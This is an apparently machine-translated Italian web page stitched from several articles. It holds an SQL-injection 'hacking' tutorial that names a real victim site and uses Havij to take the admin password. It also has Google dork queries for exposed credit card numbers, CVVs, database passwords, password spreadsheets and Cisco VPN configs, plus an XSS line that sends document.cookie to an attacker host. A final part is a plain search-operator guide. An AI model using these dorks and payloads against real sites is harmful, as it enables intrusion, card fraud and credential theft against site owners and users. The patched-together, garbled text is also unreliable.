Casa / 10 regole / Utilizziamo funzionalità di Google poco conosciute per trovare cose nascoste. Istruzioni per l'utilizzo di jSQL Injection - uno strumento multifunzionale per la ricerca e lo sfruttamento delle SQL injection in Kali Linux Inurl php cat name payment

Utilizziamo funzionalità di Google poco conosciute per trovare cose nascoste. Istruzioni per l'utilizzo di jSQL Injection - uno strumento multifunzionale per la ricerca e lo sfruttamento delle SQL injection in Kali Linux Inurl php cat name payment

E quindi, ora ti dirò come hackerare qualcosa senza alcuna conoscenza speciale. Dirò subito che c'è poco beneficio da questo, ma comunque.
Innanzitutto, devi trovare i siti stessi. Per fare ciò, vai su google.com e cerca dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Domande-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:.php?catid= 1" inurl:.php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:.php?nid=1"

ecco un piccolo elenco. Puoi usare il tuo. E così, abbiamo trovato il sito. Ad esempio http://www.vestitambov.ru/
Quindi, scarica questo programma

**Contenuto nascosto: per vedere questo contenuto nascosto il numero dei tuoi post deve essere pari o superiore a 3.**

Fare clic su OK. Quindi inseriamo il sito della vittima.
Premiamo start. Poi aspettiamo i risultati.
E così, il programma ha trovato una vulnerabilità SQL.

Successivamente, scarica Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= incolla lì il collegamento ricevuto. Non ti spiego come usare Havij e dove scaricarlo; non è difficile da trovare. Tutto. Hai ricevuto i dati di cui hai bisogno: la password dell'amministratore, quindi tocca alla tua immaginazione.

PS Questo è il mio primo tentativo di scrivere qualcosa. Scusa se qualcosa non va

Ottenere dati privati ​​non significa sempre hacking: a volte vengono pubblicati pubblicamente. La conoscenza delle impostazioni di Google e un po' di ingegno ti permetteranno di trovare molte cose interessanti, dai numeri di carta di credito ai documenti dell'FBI.

ATTENZIONE Tutte le informazioni sono fornite solo a scopo informativo. Né gli editori né l'autore sono responsabili per eventuali danni causati dai materiali di questo articolo.

Oggi tutto è connesso a Internet, senza preoccuparsi di limitarne l’accesso. Pertanto, molti dati privati ​​diventano preda dei motori di ricerca. I robot ragno non si limitano più alle pagine web, ma indicizzano tutti i contenuti disponibili su Internet e aggiungono costantemente informazioni non pubbliche ai loro database. Scoprire questi segreti è facile: devi solo sapere come chiederli.

Alla ricerca di file

In mani capaci, Google troverà rapidamente tutto ciò che non si trova su Internet, ad esempio informazioni personali e file per uso ufficiale. Spesso sono nascosti come una chiave sotto un tappeto: non ci sono vere e proprie restrizioni di accesso, i dati giacciono semplicemente sul retro del sito, dove non portano collegamenti. L'interfaccia web standard di Google fornisce solo impostazioni di ricerca avanzate di base, ma anche queste saranno sufficienti.

Puoi limitare la tua ricerca su Google a un tipo specifico di file utilizzando due operatori: filetype ed ext . Il primo specifica il formato che il motore di ricerca ha determinato dal titolo del file, il secondo specifica l'estensione del file, indipendentemente dal suo contenuto interno. Durante la ricerca in entrambi i casi, è sufficiente specificare l'estensione. Inizialmente l'operatore ext era comodo da utilizzare nei casi in cui il file non aveva caratteristiche di formato specifiche (ad esempio per cercare file di configurazione ini e cfg, che potevano contenere qualsiasi cosa). Ora gli algoritmi di Google sono cambiati e non c'è alcuna differenza visibile tra gli operatori: nella maggior parte dei casi i risultati sono gli stessi.


Filtraggio dei risultati

Per impostazione predefinita, Google cerca le parole e, in generale, tutti i caratteri inseriti in tutti i file delle pagine indicizzate. Puoi limitare l'area di ricerca in base al dominio di primo livello, a un sito specifico o alla posizione della sequenza di ricerca nei file stessi. Per le prime due opzioni utilizzare l'operatore sito seguito dal nome del dominio o del sito selezionato. Nel terzo caso, tutta una serie di operatori consente di cercare informazioni nei campi del servizio e nei metadati. Ad esempio allinurl troverà quello indicato nel corpo dei link stessi, allinanchor - nel testo dotato del tag , allintitle - nei titoli delle pagine, allintext - nel corpo delle pagine.

Per ogni operatore esiste una versione leggera con un nome più breve (senza il prefisso all). La differenza è che allinurl troverà i collegamenti con tutte le parole e inurl troverà solo i collegamenti con la prima di esse. La seconda e le successive parole della query possono apparire ovunque nelle pagine web. L'operatore inurl differisce anche da un altro operatore con un significato simile: sito. Il primo consente anche di trovare qualsiasi sequenza di caratteri in un collegamento al documento cercato (ad esempio, /cgi-bin/), ampiamente utilizzato per trovare componenti con vulnerabilità note.

Proviamolo in pratica. Prendiamo il filtro allintext e facciamo sì che la richiesta produca un elenco di numeri e codici di verifica delle carte di credito che scadranno solo tra due anni (o quando i loro proprietari si stancheranno di dare da mangiare a tutti).

Allintext: data di scadenza del numero della carta /2017 cvv

Quando leggi nelle notizie che un giovane hacker "è entrato nei server" del Pentagono o della NASA, rubando informazioni riservate, nella maggior parte dei casi stiamo parlando proprio di una tecnica così basilare di utilizzo di Google. Supponiamo di essere interessati a un elenco di dipendenti della NASA e alle loro informazioni di contatto. Sicuramente tale elenco è disponibile in formato elettronico. Per comodità o per motivi di supervisione, potrebbe anche trovarsi sul sito Web dell'organizzazione stessa. È logico che in questo caso non ci saranno collegamenti ad esso, poiché è destinato ad uso interno. Quali parole possono esserci in un file del genere? Come minimo: il campo "indirizzo". Testare tutte queste ipotesi è facile.


Inurl:nasa.gov tipo file:xlsx "indirizzo"


Usiamo la burocrazia

Ritrovamenti come questo sono un bel tocco. Una cattura davvero solida è data da una conoscenza più dettagliata degli operatori di Google per i webmaster, della Rete stessa e delle peculiarità della struttura di ciò che si cerca. Conoscendo i dettagli, puoi facilmente filtrare i risultati e perfezionare le proprietà dei file necessari per ottenere dati veramente preziosi nel resto. È divertente che qui la burocrazia venga in soccorso. Produce formulazioni standard utili per la ricerca di informazioni segrete trapelate accidentalmente su Internet.

Ad esempio, il timbro di dichiarazione di distribuzione, richiesto dal Dipartimento della Difesa degli Stati Uniti, indica restrizioni standardizzate sulla distribuzione di un documento. La lettera A indica comunicati pubblici in cui non c'è nulla di segreto; B - destinato solo ad uso interno, C - strettamente confidenziale, e così via fino alla F. Spicca separatamente la lettera X, che contrassegna informazioni particolarmente preziose che rappresentano un segreto di stato di altissimo livello. Lasciamo che coloro che dovrebbero farlo in servizio cerchino tali documenti e ci limiteremo ai file con la lettera C. Secondo la direttiva DoDI 5230.24, questo contrassegno è assegnato ai documenti contenenti una descrizione delle tecnologie critiche che rientrano nel controllo delle esportazioni . Puoi trovare informazioni così attentamente protette sui siti nel dominio di primo livello.mil, assegnato all'esercito americano.

"DICHIARAZIONE DI DISTRIBUZIONE C" inurl:navy.mil

È molto conveniente che il dominio .mil contenga solo siti del Dipartimento della Difesa degli Stati Uniti e delle sue organizzazioni contrattuali. I risultati di ricerca con una limitazione di dominio sono eccezionalmente puliti e i titoli parlano da soli. Cercare i segreti russi in questo modo è praticamente inutile: nei domini.ru e.rf regna il caos, e i nomi di molti sistemi d'arma suonano come quelli botanici (PP "Kiparis", cannoni semoventi "Akatsia") o addirittura favolosi ( TOS “Buratino”).


Studiando attentamente un qualsiasi documento proveniente da un sito del dominio .mil, puoi visualizzare altri indicatori per affinare la ricerca. Ad esempio un riferimento alle restrizioni all'esportazione “Sec 2751”, utile anche per la ricerca di informazioni tecniche interessanti. Di tanto in tanto viene rimosso dai siti ufficiali in cui appariva una volta, quindi se non riesci a seguire un collegamento interessante nei risultati di ricerca, utilizza la cache di Google (operatore cache) o il sito Internet Archive.

Salendo tra le nuvole

Oltre ai documenti governativi declassificati accidentalmente, nella cache di Google compaiono occasionalmente collegamenti a file personali di Dropbox e altri servizi di archiviazione dati che creano collegamenti "privati" a dati pubblicati pubblicamente. È ancora peggio con i servizi alternativi e fatti in casa. Ad esempio, la query seguente trova dati per tutti i clienti Verizon che hanno un server FTP installato e utilizzano attivamente il proprio router.

Allinurl:ftp://verizon.net

Ora ci sono più di quarantamila persone così intelligenti e nella primavera del 2015 ce n'erano molte di più. Invece di Verizon.net, puoi sostituire il nome di qualsiasi fornitore noto, e più è famoso, maggiore può essere la cattura. Attraverso il server FTP integrato, puoi visualizzare i file su un dispositivo di archiviazione esterno collegato al router. Di solito si tratta di un NAS per il lavoro remoto, un cloud personale o una sorta di download di file peer-to-peer. Tutti i contenuti di tali media sono indicizzati da Google e altri motori di ricerca, quindi puoi accedere ai file archiviati su unità esterne tramite un collegamento diretto.

Guardando le configurazioni

Prima della migrazione su larga scala nel cloud, come spazio di archiviazione remoto regnavano semplici server FTP, che presentavano anche molte vulnerabilità. Molti di loro sono ancora attuali oggi. Ad esempio, il popolare programma WS_FTP Professional memorizza i dati di configurazione, gli account utente e le password nel file ws_ftp.ini. È facile da trovare e leggere, poiché tutti i record vengono salvati in formato testo e le password vengono crittografate con l'algoritmo Triple DES dopo un minimo offuscamento. Nella maggior parte delle versioni è sufficiente scartare semplicemente il primo byte.

È facile decrittografare tali password utilizzando l'utilità WS_FTP Password Decryptor o un servizio Web gratuito.

Quando si parla di hacking di un sito web arbitrario, di solito si intende ottenere una password dai log e dai backup dei file di configurazione di CMS o applicazioni di e-commerce. Se conosci la loro struttura tipica puoi facilmente indicare le parole chiave. Righe come quelle trovate in ws_ftp.ini sono estremamente comuni. Ad esempio, in Drupal e PrestaShop c'è sempre un identificatore utente (UID) e una password corrispondente (pwd) e tutte le informazioni sono archiviate in file con estensione .inc. Puoi cercarli come segue:

"pwd=" "UID=" ext:inc

Rivelazione delle password DBMS

Nei file di configurazione dei server SQL, i nomi utente e gli indirizzi e-mail vengono archiviati in testo non crittografato e i relativi hash MD5 vengono scritti al posto delle password. A rigor di termini, è impossibile decrittografarli, ma è possibile trovare una corrispondenza tra le coppie hash-password conosciute.

Esistono ancora DBMS che non utilizzano nemmeno l'hashing delle password. I file di configurazione di ciascuno di essi possono essere semplicemente visualizzati nel browser.

Testo: DB_PASSWORD tipo file: env

Con l'avvento dei server Windows, il registro ha parzialmente preso il posto dei file di configurazione. Puoi cercare tra i suoi rami esattamente nello stesso modo, usando reg come tipo di file. Ad esempio, in questo modo:

Tipo file:reg HKEY_CURRENT_USER "Password"=

Non dimentichiamo l'ovvio

A volte è possibile accedere a informazioni riservate utilizzando dati che sono stati aperti accidentalmente e che sono venuti a conoscenza di Google. L'opzione ideale è trovare un elenco di password in un formato comune. Solo le persone disperate possono archiviare le informazioni sull'account in un file di testo, un documento Word o un foglio di calcolo Excel, ma ce ne sono sempre abbastanza.

Tipo file:xls inurl:password

Da un lato, ci sono molti mezzi per prevenire tali incidenti. È necessario specificare diritti di accesso adeguati in htaccess, applicare patch al CMS, non utilizzare script per mancini e chiudere altri buchi. Esiste anche un file con un elenco di eccezioni robots.txt che impedisce ai motori di ricerca di indicizzare i file e le directory in esso specificati. D'altra parte, se la struttura del file robots.txt su qualche server differisce da quella standard, diventa immediatamente chiaro cosa si sta cercando di nascondere su di esso.

L'elenco delle directory e dei file su qualsiasi sito è preceduto dall'indice standard di. Poiché per scopi di servizio deve apparire nel titolo, è logico limitare la ricerca all'operatore intitle. Cose interessanti si trovano nelle directory /admin/, /personal/, /etc/ e persino /secret/.

Resta sintonizzato per gli aggiornamenti

La rilevanza qui è estremamente importante: le vecchie vulnerabilità vengono chiuse molto lentamente, ma Google e i suoi risultati di ricerca cambiano costantemente. C'è anche una differenza tra un filtro "ultimo secondo" (&tbs=qdr:s alla fine dell'URL della richiesta) e un filtro "in tempo reale" (&tbs=qdr:1).

Anche l'intervallo temporale della data dell'ultimo aggiornamento del file viene indicato implicitamente da Google. Tramite l'interfaccia web grafica è possibile selezionare uno dei periodi standard (ora, giorno, settimana, ecc.) o impostare un intervallo di date, ma questo metodo non è adatto all'automazione.

Dall'aspetto della barra degli indirizzi, puoi solo immaginare un modo per limitare l'output dei risultati utilizzando la costruzione &tbs=qdr:. La lettera y dopo imposta il limite di un anno (&tbs=qdr:y), m mostra i risultati dell'ultimo mese, w - per la settimana, d - per il giorno passato, h - per l'ultima ora, n - per il minuto, e s - per dammi un secondo. I risultati più recenti che Google ha appena reso noti si trovano utilizzando il filtro &tbs=qdr:1 .

Se hai bisogno di scrivere uno script intelligente, ti sarà utile sapere che l'intervallo di date è impostato in Google in formato giuliano utilizzando l'operatore daterange. Ad esempio, ecco come puoi trovare l'elenco dei documenti PDF con la parola riservata, scaricati dal 1 gennaio al 1 luglio 2015.

Tipo di file confidenziale: intervallo di date PDF: 2457024-2457205

L'intervallo è indicato nel formato della data giuliana senza tenere conto della parte frazionaria. Tradurli manualmente dal calendario gregoriano è scomodo. È più semplice utilizzare un convertitore di date.

Targeting e filtraggio di nuovo

Oltre a specificare operatori aggiuntivi nella query di ricerca, questi possono essere inviati direttamente nel corpo del collegamento. Ad esempio, la specifica filetype:pdf corrisponde alla costruzione as_filetype=pdf . Ciò rende conveniente chiedere eventuali chiarimenti. Diciamo che l'output dei risultati viene specificato solo dalla Repubblica dell'Honduras aggiungendo la costruzione cr=countryHN all'URL di ricerca e solo dalla città di Bobruisk - gcs=Bobruisk. Puoi trovare un elenco completo nella sezione sviluppatori.

Gli strumenti di automazione di Google sono progettati per semplificare la vita, ma spesso aggiungono problemi. Ad esempio, la città dell’utente è determinata dall’IP dell’utente tramite WHOIS. Sulla base di queste informazioni, Google non solo bilancia il carico tra i server, ma modifica anche i risultati della ricerca. A seconda della regione, per la stessa richiesta, nella prima pagina appariranno risultati diversi e alcuni di essi potrebbero essere completamente nascosti. Il codice di due lettere dopo la direttiva gl=country ti aiuterà a sentirti cosmopolita e a cercare informazioni da qualsiasi paese. Ad esempio, il codice dei Paesi Bassi è NL, ma il Vaticano e la Corea del Nord non hanno un proprio codice in Google.

Spesso i risultati della ricerca risultano confusi anche dopo aver utilizzato diversi filtri avanzati. In questo caso, è facile chiarire la richiesta aggiungendovi diverse parole di eccezione (davanti a ciascuna di esse viene posto un segno meno). Ad esempio, servizi bancari, nomi e tutorial vengono spesso utilizzati con la parola Personale. Pertanto, risultati di ricerca più puliti verranno mostrati non da un esempio da manuale di query, ma da uno perfezionato:

Titolo:"Indice di /Personale/" -nomi -tutorial -bancario

Un ultimo esempio

Un hacker sofisticato si distingue per il fatto che si procura da solo tutto ciò di cui ha bisogno. Ad esempio, la VPN è una cosa conveniente, ma costosa, oppure temporanea e con restrizioni. Sottoscrivere un abbonamento per te stesso è troppo costoso. È positivo che ci siano iscrizioni di gruppo e con l'aiuto di Google è facile entrare a far parte di un gruppo. Per fare ciò, basta trovare il file di configurazione di Cisco VPN, che ha un'estensione PCF piuttosto non standard e un percorso riconoscibile: Programmi\Cisco Systems\VPN Client\Profiles. Una richiesta e ti unisci, ad esempio, al simpatico team dell'Università di Bonn.

Tipo di file: pcf vpn OR Gruppo

INFO Google trova file di configurazione con password, ma molti di essi sono scritti in forma crittografata o sostituiti con hash. Se vedi stringhe di lunghezza fissa, cerca immediatamente un servizio di decrittazione.

Le password vengono archiviate crittografate, ma Maurice Massard ha già scritto un programma per decrittografarle e lo fornisce gratuitamente tramite thecampusgeeks.com.

Google esegue centinaia di diversi tipi di attacchi e test di penetrazione. Esistono molte opzioni che riguardano programmi popolari, principali formati di database, numerose vulnerabilità di PHP, cloud e così via. Sapere esattamente cosa stai cercando renderà molto più semplice trovare le informazioni di cui hai bisogno (soprattutto quelle che non intendevi rendere pubbliche). Shodan non è l'unico che si nutre di idee interessanti, ma ogni database di risorse di rete indicizzate!

Ho deciso di parlare un po’ della sicurezza delle informazioni. L'articolo sarà utile per i programmatori alle prime armi e per coloro che hanno appena iniziato a impegnarsi nello sviluppo di frontend. Qual è il problema?

Molti sviluppatori alle prime armi si lasciano così trasportare dalla scrittura del codice da dimenticare completamente la sicurezza del proprio lavoro. E, cosa più importante, dimenticano vulnerabilità come le query SQL e XXS. Inoltre inventano password semplici per i loro pannelli amministrativi e sono sottoposti a forza bruta. Quali sono questi attacchi e come evitarli?

SQL Injection

L'SQL injection è il tipo più comune di attacco ad un database, che viene effettuato durante una query SQL per uno specifico DBMS. Molte persone e anche grandi aziende soffrono di tali attacchi. Il motivo è un errore dello sviluppatore durante la scrittura del database e, in senso stretto, delle query SQL.

Un attacco SQL injection è possibile a causa dell'elaborazione errata dei dati di input utilizzati nelle query SQL. Se l'attacco di un hacker va a buon fine si rischia di perdere non solo il contenuto dei database, ma anche le password e i log del pannello amministrativo. E questi dati saranno sufficienti per assumere completamente il controllo del sito o apportarvi modifiche irreversibili.

L'attacco può essere riprodotto con successo in script scritti in PHP, ASP, Perl e altri linguaggi. Il successo di tali attacchi dipende maggiormente dal DBMS utilizzato e da come viene implementato lo script stesso. Esistono molti siti vulnerabili alle iniezioni SQL nel mondo. Questo è facile da verificare. Basta inserire "dorks": si tratta di query speciali per la ricerca di siti vulnerabili. Ecco qui alcuni di loro:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:articolo.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:pagina.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:articolo.php?id=

Come usarli? Basta inserirli in un motore di ricerca Google o Yandex. Il motore di ricerca ti fornirà non solo un sito vulnerabile, ma anche una pagina su questa vulnerabilità. Ma non ci fermeremo qui e non ci assicureremo che la pagina sia davvero vulnerabile. Per fare ciò è sufficiente inserire una virgoletta singola “‘ dopo il valore “id=1”. Qualcosa come questo:

  • inurl:games.php?id=1'

E il sito ci darà un errore sulla query SQL. Di cosa ha bisogno il nostro hacker dopo?

E poi ha bisogno proprio di questo collegamento alla pagina di errore. Quindi il lavoro sulla vulnerabilità nella maggior parte dei casi avviene nella distribuzione "Kali linux" con le sue utilità per questa parte: introdurre il codice di iniezione ed eseguire le operazioni necessarie. Come ciò accadrà, non posso dirtelo. Ma puoi trovare informazioni a riguardo su Internet.

Attacco XSS

Questo tipo di attacco viene effettuato sui file Cookie. Gli utenti, a loro volta, adorano salvarli. Perché no? Cosa faremmo senza di loro? Dopotutto, grazie ai cookie, non dobbiamo inserire la password per Vk.com o Mail.ru cento volte. E sono pochi quelli che li rifiutano. Ma su Internet per gli hacker spesso appare una regola: il coefficiente di convenienza è direttamente proporzionale al coefficiente di insicurezza.

Per implementare un attacco XSS, il nostro hacker ha bisogno della conoscenza di JavaScript. A prima vista, il linguaggio è molto semplice e innocuo, perché non ha accesso alle risorse del computer. Un hacker può lavorare solo con JavaScript in un browser, ma questo è sufficiente. Dopotutto, la cosa principale è inserire il codice nella pagina web.

Non parlerò in dettaglio del processo di attacco. Ti dirò solo le basi e il significato di come ciò accade.

Un hacker può aggiungere codice JS ad alcuni forum o libri degli ospiti:

document.location.href ="http://192.168.1.7/sniff.php?test"

Gli script ci reindirizzeranno alla pagina infetta, dove verrà eseguito il codice: che si tratti di uno sniffer, di una sorta di archivio o di un exploit, che in qualche modo ruberà i nostri cookie dalla cache.

Perché JavaScript? Perché JavaScript è ottimo nel gestire le richieste web e ha accesso ai cookie. Ma se il nostro script ci porta su qualche sito, l'utente lo noterà facilmente. Qui l'hacker utilizza un'opzione più astuta: inserisce semplicemente il codice nell'immagine.

Img=nuova immagine();

Img.src="http://192.168.1.7/sniff.php?"+document.cookie;

Creiamo semplicemente un'immagine e le assegniamo il nostro script come indirizzo.

Come proteggersi da tutto questo? È molto semplice: non fare clic su collegamenti sospetti.

Attacchi DoS e DDos

DoS (dall'inglese Denial of Service - Denial of Service) è un attacco hacker a un sistema informatico con l'obiettivo di provocarne il malfunzionamento. Si tratta della creazione di condizioni in cui gli utenti in buona fede del sistema non possono accedere alle risorse di sistema fornite (server) o tale accesso è difficile. Un guasto del sistema può anche essere un passo verso la sua acquisizione se, in una situazione di emergenza, il software produce informazioni critiche: ad esempio una versione, parte del codice di un programma, ecc. Ma molto spesso questa è una misura della pressione economica: la perdita di un semplice servizio che genera reddito. Le fatture del fornitore o le misure per evitare un attacco colpiscono notevolmente il "bersaglio" in tasca. Attualmente gli attacchi DoS e DDoS sono i più popolari perché permettono a quasi tutti i sistemi di fallire senza lasciare prove giuridicamente significative.

Qual è la differenza tra attacco DoS e DDos?

Il DoS è un attacco progettato in modo intelligente. Ad esempio, se il server non controlla la correttezza dei pacchetti in entrata, un hacker può effettuare una richiesta che impiegherà un'eternità per essere elaborata e non ci sarà abbastanza tempo del processore per funzionare con altre connessioni. Di conseguenza, ai clienti verrà negato il servizio. Ma non sarà possibile sovraccaricare o disabilitare in questo modo siti grandi e famosi. Sono dotati di canali abbastanza ampi e server super potenti in grado di far fronte a tale sovraccarico senza problemi.

DDoS è in realtà lo stesso attacco di DoS. Ma se in DoS è presente un pacchetto di richiesta, in DDoS possono essercene centinaia o più. Anche i server super potenti potrebbero non essere in grado di far fronte a un tale sovraccarico. Lasciate che vi faccia un esempio.

Un attacco DoS avviene quando stai conversando con qualcuno, ma poi una persona maleducata si avvicina e inizia a gridare ad alta voce. È impossibile o molto difficile parlare. Soluzione: chiamare la sicurezza, che calmerà e allontanerà la persona dal locale. Gli attacchi DDoS avvengono quando una folla di migliaia di persone così maleducate si precipita all'interno. In questo caso la sicurezza non potrà legare tutti e portarli via.

DoS e DDoS vengono eseguiti da computer, i cosiddetti zombie. Si tratta di computer di utenti hackerati da hacker che non sospettano nemmeno che la loro macchina stia partecipando ad un attacco a qualsiasi server.

Come proteggersi da questo? In generale, assolutamente no. Ma puoi rendere le cose più difficili per un hacker. Per fare ciò, devi scegliere un buon hosting con server potenti.

Attacco di forza bruta

Uno sviluppatore può ideare molti sistemi di protezione dagli attacchi, rivedere completamente gli script che abbiamo scritto, controllare le vulnerabilità del sito, ecc. Ma quando arriva all’ultimo passaggio del layout del sito web, ovvero quando imposta semplicemente una password per il pannello di amministrazione, potrebbe dimenticarsi di una cosa. Parola d'ordine!

È severamente sconsigliato impostare una password semplice. Potrebbe essere 12345, 1114457, vasya111, ecc. Non è consigliabile impostare password lunghe meno di 10-11 caratteri. Altrimenti potresti essere soggetto all'attacco più comune e semplice: la forza bruta.

La forza bruta è un attacco di ricerca di password nel dizionario che utilizza programmi speciali. I dizionari possono essere diversi: latino, enumerazione per numeri, diciamo fino a un certo intervallo, misto (latino + numeri), e ci sono anche dizionari con caratteri univoci @#4$%&*~~`’”\ ? eccetera.

Naturalmente questo tipo di attacco è facile da evitare: basta inventare una password complessa. Anche un captcha può salvarti. Inoltre, se il tuo sito è realizzato su un CMS, molti di essi rilevano questo tipo di attacco e bloccano l'IP. Devi sempre ricordare che più sono diversi i caratteri in una password, più difficile sarà indovinarla.

Come funzionano gli hacker? Nella maggior parte dei casi sospettano o conoscono in anticipo parte della password. È abbastanza logico supporre che la password dell’utente non sarà certamente composta da 3 o 5 caratteri. Tali password portano a frequenti attacchi di hacking. Fondamentalmente, gli hacker prendono un intervallo compreso tra 5 e 10 caratteri e aggiungono diversi caratteri che potrebbero conoscere in anticipo. Successivamente, vengono generate le password con gli intervalli richiesti. La distribuzione Kali Linux dispone anche di programmi per questi casi. E voilà, l'attacco non durerà più a lungo, poiché il volume del dizionario non è più così grande. Inoltre, un hacker può sfruttare la potenza della scheda video. Alcuni supportano il sistema CUDA e la velocità di ricerca aumenta fino a 10 volte. E ora vediamo che un attacco così semplice è del tutto reale. Ma non sono solo i siti web ad essere soggetti alla forza bruta.

Cari sviluppatori, non dimenticate mai il sistema di sicurezza informatica, perché oggi molte persone, compresi gli stati, soffrono di questo tipo di attacchi. Dopotutto, la più grande vulnerabilità è una persona che può sempre distrarsi da qualche parte o perdersi qualcosa. Siamo programmatori, ma non macchine programmate. Stai sempre in guardia, perché la perdita di informazioni può avere gravi conseguenze!

Come effettuare una ricerca correttamente utilizzando google.com

Probabilmente tutti sanno come utilizzare un motore di ricerca come Google =) Ma non tutti sanno che se componi correttamente una query di ricerca utilizzando costruzioni speciali, puoi ottenere i risultati di ciò che stai cercando in modo molto più efficiente e veloce =) In questo articolo Cercherò di mostrarlo e cosa devi fare per eseguire la ricerca correttamente

Google supporta diversi operatori di ricerca avanzata che hanno un significato speciale durante la ricerca su google.com. In genere, queste affermazioni modificano la ricerca o addirittura dicono a Google di eseguire tipi di ricerca completamente diversi. Ad esempio, il collegamento: costrutto è un operatore speciale e la richiesta collegamento:www.google.com non eseguirà una ricerca normale, ma troverà invece tutte le pagine Web che contengono collegamenti a google.com.
tipi di richiesta alternativi

cache: se includi altre parole in una query, Google evidenzierà quelle parole incluse nel documento memorizzato nella cache.
Per esempio, cache:www.sito web mostrerà il contenuto memorizzato nella cache con la parola "web" evidenziata.

collegamento: la query di ricerca sopra mostrerà le pagine Web che contengono collegamenti alla query specificata.
Per esempio: collegamento: www.sito verranno visualizzate tutte le pagine che hanno un collegamento a http://www.site

correlati: visualizza le pagine Web "correlate" alla pagina Web specificata.
Per esempio, correlato: www.google.com elencherà le pagine web simili alla home page di Google.

info: Richiedi informazioni: presenterà alcune informazioni che Google ha sulla pagina web che stai richiedendo.
Per esempio, informazioni:sito web mostrerà informazioni sul nostro forum =) (Armada - Forum per webmaster per adulti).

Altre richieste di informazioni

define: La query define: fornirà una definizione delle parole inserite dopo di essa, raccolta da varie fonti online. La definizione riguarderà l'intera frase inserita (ovvero includerà tutte le parole nella query esatta).

azioni: se avvii una query con azioni: Google elaborerà il resto dei termini della query come simboli di azioni e si collegherà a una pagina che mostra informazioni già pronte per questi simboli.
Per esempio, azioni: Intel yahoo mostrerà informazioni su Intel e Yahoo. (Nota che dovresti digitare i simboli delle ultime notizie, non il nome dell'azienda)

Modificatori di query

site: Se includi site: nella tua query, Google limiterà i risultati ai siti web che trova in quel dominio.
Puoi anche cercare per singole zone, come ru, org, com, ecc. ( sito: com sito: ru)

allintitle: se esegui una query con allintitle:, Google limiterà i risultati a tutte le parole della query nel titolo.
Per esempio, allintitle: ricerca google restituirà tutte le pagine di Google tramite ricerca come immagini, blog, ecc

intitle: se includi intitle: nella tua query, Google limiterà i risultati ai documenti contenenti quella parola nel titolo.
Per esempio, titolo: Affari

allinurl: se esegui una query con allinurl: Google limiterà i risultati a tutte le parole della query nell'URL.
Per esempio, allinurl: ricerca su google restituirà i documenti con Google e cercherà nel titolo. Inoltre, come opzione, puoi separare le parole con una barra (/), quindi le parole su entrambi i lati della barra verranno cercate all'interno della stessa pagina: Esempio allinurl: foo/bar

inurl: se includi inurl: nella tua query, Google limiterà i risultati ai documenti contenenti quella parola nell'URL.
Per esempio, Animazione inurl:sito

